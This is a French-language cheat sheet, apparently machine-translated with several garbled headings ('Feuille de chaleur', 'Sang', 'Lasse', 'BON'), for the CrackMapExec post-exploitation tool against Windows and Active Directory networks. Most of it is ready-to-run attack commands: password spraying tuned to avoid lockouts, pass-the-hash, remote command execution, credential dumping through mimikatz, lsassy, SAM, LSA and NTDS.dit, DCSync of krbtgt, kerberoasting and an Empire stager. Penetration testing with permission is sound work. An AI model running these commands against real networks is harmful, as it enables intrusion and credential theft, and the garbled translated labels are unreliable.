CrackMapExec Feuille de chaleur

Copier toutes les commandes Générer PDF

Aperçu général

CrackMapExec (CME) est un outil post-exploitation conçu pour les tests de pénétration et les opérations de l'équipe rouge dans les environnements Windows/Active Directory. Il est souvent décrit comme un « couteau de l'Armée suisse » pour les tests de pénétration en réseau, permettant le dénombrement, les tests de reconnaissance et l'exécution de commandes sur plusieurs protocoles.

C'est pas vrai. Attention: CrackMapExec est un outil de test de sécurité qui ne devrait être utilisé que dans les environnements où vous avez la permission explicite de le faire.

Installation

Utilisation de pipx (Recommandé)

# Install pipx if not already installed
python3 -m pip install --user pipx
python3 -m pipx ensurepath

# Install CrackMapExec
pipx install crackmapexec

Sur Kali Linux

sudo apt update
sudo apt install -y crackmapexec
```_

### De GitHub
```bash
git clone https://github.com/byt3bl33d3r/CrackMapExec
cd CrackMapExec
poetry install
```_

### Utilisation de Docker
```bash
docker pull byt3bl33d3r/crackmapexec
docker run -it --entrypoint=/bin/bash byt3bl33d3r/crackmapexec

Utilisation de base

Syntaxe générale

crackmapexec <protocol> <target(s)> -u <username> -p <password> [options]

Protocoles appuyés

smb : Bloc de messages du serveur
winrm: Gestion à distance Windows
ldap: Protocole d'accès au répertoire léger
mssql : Serveur SQL de Microsoft
ssh : Shell sécurisé
rdp : Protocole de bureau à distance
ftp : Protocole de transfert de fichiers

Spécification de la cible

# Single target
crackmapexec smb 192.168.1.100

# Multiple targets
crackmapexec smb 192.168.1.100,192.168.1.101

# IP range
crackmapexec smb 192.168.1.1-255

# CIDR notation
crackmapexec smb 192.168.1.0/24

# From file
crackmapexec smb targets.txt

Méthodes d'authentification

Nom d'utilisateur et mot de passe

# Single username and password
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123'

# Multiple usernames
crackmapexec smb 192.168.1.0/24 -u administrator,user1 -p 'Password123'

# Multiple passwords
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123','Welcome1'

# From files
crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt

Pass-the-Hash

# NTLM hash
crackmapexec smb 192.168.1.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'

# Multiple hashes
crackmapexec smb 192.168.1.0/24 -u administrator -H 'hash1' 'hash2'

# From file
crackmapexec smb 192.168.1.0/24 -u administrator -H hashes.txt

Authentification locale

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --local-auth

Authentification du domaine

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -d DOMAIN

Commandes du protocole SMB

Énumération de base

# List shares
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --shares

# List logged-on users
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --loggedon-users

# List domain users
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --users

# List domain groups
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --groups

# List local groups
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --local-groups

# Get domain password policy
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --pass-pol

# Check for SMB signing
crackmapexec smb 192.168.1.0/24 --gen-relay-list relay_targets.txt

Exécution des commandes

# Execute command
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -x 'whoami'

# Execute PowerShell command
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -X '$PSVersionTable'

Opérations de fichiers

# List files in share
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --spider C$ --pattern '*.txt'

# Download file
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --get-file 'C:\temp\file.txt' /tmp/file.txt

# Upload file
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --put-file /tmp/file.txt 'C:\temp\file.txt'

Commandes du protocole WinRM

Énumération de base

# Check WinRM access
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123'

Exécution des commandes

# Execute command
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123' -x 'whoami'

# Execute PowerShell command
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123' -X '$PSVersionTable'

Commandements du protocole LDAP

Énumération de base

# Get domain information
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --domain

# List domain users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --users

# List domain groups
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --groups

# List domain computers
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --computers

# Get domain password policy
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --pass-pol

# Get domain trusts
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --trusts

Énumération avancée

# Search for specific attributes
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' -M maq -o ATTRIBUTES=description

# Search for unconstrained delegation
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --trusted-for-delegation

# Search for constrained delegation
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --allowed-to-delegate

# Search for ASREP roastable users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --asreproast output.txt

# Search for kerberoastable users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --kerberoasting output.txt

Commandes du protocole MSSQL

Énumération de base

# Check MSSQL access
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123'

# List databases
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -q 'SELECT name FROM master.dbo.sysdatabases'

Exécution des commandes

# Execute command
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -x 'whoami'

# Execute query
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -q 'SELECT @@version'

Utilisation du module

Gestion des modules

# List available modules
crackmapexec <protocol> --list-modules

# Get module options
crackmapexec <protocol> -M <module> --options

# Use module
crackmapexec <protocol> <target> -u <username> -p <password> -M <module> -o OPTION1=value1 OPTION2=value2

Modules communs

Mimikatz

# Dump credentials
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='sekurlsa::logonpasswords'

# Get LSA secrets
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::secrets'

# Get SAM database
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::sam'

# Get DCSync
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::dcsync /domain:domain.local /user:krbtgt'

Empire

# Generate Empire stager
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M empire_exec -o LISTENER=http

Affichage de l'alimentation

# Run PowerView commands
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M powerview -o COMMAND='Get-NetDomain'

Sang

# Collect BloodHound data
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M bloodhound -o COLLECTION=All

Lasse

# Dump credentials using lsassy
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M lsassy

Enum_DNS

# Enumerate DNS records
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M enum_dns

BON

# Get objects and attributes from domain
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' -M goad

Techniques avancées

Pulvérisation du mot de passe

# Spray single password against multiple users
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Spring2023!'

# Spray multiple passwords against single user
crackmapexec smb 192.168.1.0/24 -u administrator -p passwords.txt

# Spray with jitter to avoid lockouts
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Spring2023!' --continue-on-success --fail-limit 1 --jitter 10

Récolte crédible

# Dump SAM database
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --sam

# Dump LSA secrets
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --lsa

# Dump NTDS.dit
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --ntds

Opérations de bases de données

Initialiser la base de données

crackmapexec smb 192.168.1.0/24 --database

Afficher la base de données

# List hosts
crackmapexec smb --database -L

# List credentials
crackmapexec smb --database -C

# Use credentials from database
crackmapexec smb 192.168.1.0/24 --database -id 1

Options communes

Option	Description
`-h, --help`	Show help message and exit
`-t THREADS`	Set number of concurrent threads (default: 100)
`--timeout TIMEOUT`	Set timeout for connections (default: 5 seconds)
`--verbose`	Enable verbose output
`--debug`	Enable debug output
`--continue-on-success`	Continue authentication attempts even after success
`--no-bruteforce`	No bruteforce, only use provided credentials
`--fail-limit LIMIT`	Number of failed login attempts before giving up on a host
`--jitter JITTER`	Add random delay between authentication attempts (in seconds)
`--local-auth`	Authenticate using local accounts instead of domain
`-d, --domain DOMAIN`	Domain to authenticate to
`--no-output`	Do not display output
`--output-file FILE`	Write output to file
`--log`	Enable logging to file (default: ~/.cme/logs/)

Options spécifiques au protocole

Options SMB

Option	Description
`--shares`	List available shares
`--sessions`	List active sessions
`--disks`	List disks
`--loggedon-users`	List logged-on users
`--users`	List domain users
`--groups`	List domain groups
`--local-groups`	List local groups
`--pass-pol`	Get password policy
`--rid-brute [MAX_RID]`	Enumerate users by bruteforcing RID
`--sam`	Dump SAM hashes
`--lsa`	Dump LSA secrets
`--ntds`	Dump NTDS.dit
`--exec-method \\{smbexec,wmiexec,mmcexec,atexec\\}`	Method to execute commands

Options LDAP

Option	Description
`--users`	List domain users
`--groups`	List domain groups
`--computers`	List domain computers
`--domain`	Get domain information
`--pass-pol`	Get password policy
`--trusts`	Get domain trusts
`--asreproast [OUTFILE]`	Get AS-REP roastable users
`--kerberoasting [OUTFILE]`	Get kerberoastable users
`--trusted-for-delegation`	Get users/computers with unconstrained delegation
`--allowed-to-delegate`	Get users/computers with constrained delegation

Options de WinRM

Option	Description
`--port [PORT]`	WinRM port (default: 5985)
`--ssl`	Use SSL for WinRM

Options MSSQL

Option	Description
`--port [PORT]`	MSSQL port (default: 1433)
`-q QUERY`	Execute SQL query

Ressources

[Répertoire officiel GitHub] (LINK_4)
[CrackMapExec Wiki] (LINK_4)
[Guide d'installation CrackMapExec] (LINK_4)
CrackMapExec Documentation du module